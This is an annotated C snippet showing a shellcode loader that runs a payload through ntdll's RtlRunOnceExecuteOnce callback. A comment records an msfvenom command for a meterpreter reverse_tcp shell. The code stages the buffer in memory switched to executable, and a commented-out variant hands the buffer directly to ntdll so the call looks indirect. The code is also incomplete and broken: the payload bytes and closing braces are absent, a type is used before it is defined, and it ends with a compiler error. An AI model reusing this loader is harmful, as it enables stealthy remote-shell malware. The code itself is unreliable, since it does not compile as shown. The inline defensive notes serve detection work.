Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
// Local prototype for ntdll's RtlRunOnceExecuteOnce, which calls `func` with
// `once`, `param` and `context`.
// NOTE(review): PRTL_RUN_ONCE_INIT_FN is used here before this file defines any
// such name; the typedef below introduces RTL_RUN_ONCE_INIT_FN (no leading P).
// Unless the included SDK headers already provide the P-prefixed name, this
// line will not compile -- confirm against the toolchain in use.
// NOTE(review): the routine is documented as returning a 32-bit status, so a
// WORD return type looks too narrow -- confirm.
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
// Pointer-to-callback type used for the casts in main(): takes the run-once
// object, an optional parameter and an optional context slot, returns ULONG.
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// Payload buffer. The comment below records the generator command line (a
// reverse_tcp meterpreter payload with LHOST left blank); the initializer bytes
// themselves are not present on this page, so the declaration is incomplete as
// shown.
// Triage note: a static byte array that is later copied into freshly allocated
// memory and made executable is worth flagging when reviewing an unknown binary.
// msfvenom LPORT=8080 LHOST= -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
// Run-once callback that main() hands to RtlRunOnceExecuteOnce.
//
// Prints Parameter as a string, then stages shellcode_bin in a new allocation:
// the region is reserved and committed PAGE_READWRITE, filled with memcpy, and
// then switched to PAGE_EXECUTE_READ. It returns 0 afterwards. The function's
// closing brace is missing from this page, so lines may have been lost here.
//
// RunOnce and Context are not used. Parameter is "Hello World" when called
// from main().
//
// Defensive note: the observable here is private (non-image-backed) memory
// becoming executable through VirtualProtect after being written. The region is
// never writable and executable at the same time, so monitoring that looks only
// for PAGE_EXECUTE_READWRITE allocations does not cover this sequence.
ULONG myFunc(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context) {
// Parameter is annotated optional but is passed to %s without a NULL check.
printf("Parameter: %s\n", Parameter);
// Receives the previous protection value from VirtualProtect; not read again.
DWORD flOldProtect = 0;
// The result is not checked; a NULL return would reach memcpy below.
LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
memcpy(addressPointer, shellcode_bin, sizeof(shellcode_bin));
// RW -> RX transition; the BOOL result is ignored.
VirtualProtect(addressPointer, sizeof(shellcode_bin), PAGE_EXECUTE_READ, &flOldProtect);
// NOTE(review): run-once init callbacks are documented to return nonzero on
// success, so returning 0 here would be reported as a failure -- confirm.
return 0;
// Entry point. Zero-initialises an RTL_RUN_ONCE and asks RtlRunOnceExecuteOnce
// to invoke myFunc with the string "Hello World" and a NULL context pointer.
// The call's return value is discarded, and the closing brace and any return
// statement are missing from this page.
//
// The commented-out lines describe a second variant: stage the buffer here and
// pass its address as the callback, so the indirect call is made by the ntdll
// routine instead of by this program.
//
// Defensive note: in that variant the program contains no thread creation and
// no explicit call through a function pointer; the callback argument is an
// address in private memory. Telemetry that checks whether callback targets and
// call-stack frames resolve to image-backed memory is what covers this case.
int main() {
RTL_RUN_ONCE rtlRunOnce = { 0 };
char *param = "Hello World";
// you can run a function with a parameter and a context
RtlRunOnceExecuteOnce(&rtlRunOnce, (RTL_RUN_ONCE_INIT_FN) myFunc, param, NULL);
// or the shellcode directly
// DWORD flOldProtect = 0;
// LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
// memcpy(addressPointer, shellcode_bin, sizeof(shellcode_bin));
// VirtualProtect(addressPointer, sizeof(shellcode_bin), PAGE_EXECUTE_READ, &flOldProtect);
// RtlRunOnceExecuteOnce(&rtlRunOnce, (RTL_RUN_ONCE_INIT_FN) addressPointer, NULL, NULL);

Undefined identifier PRTL_RUN_ONCE_INIT_FN
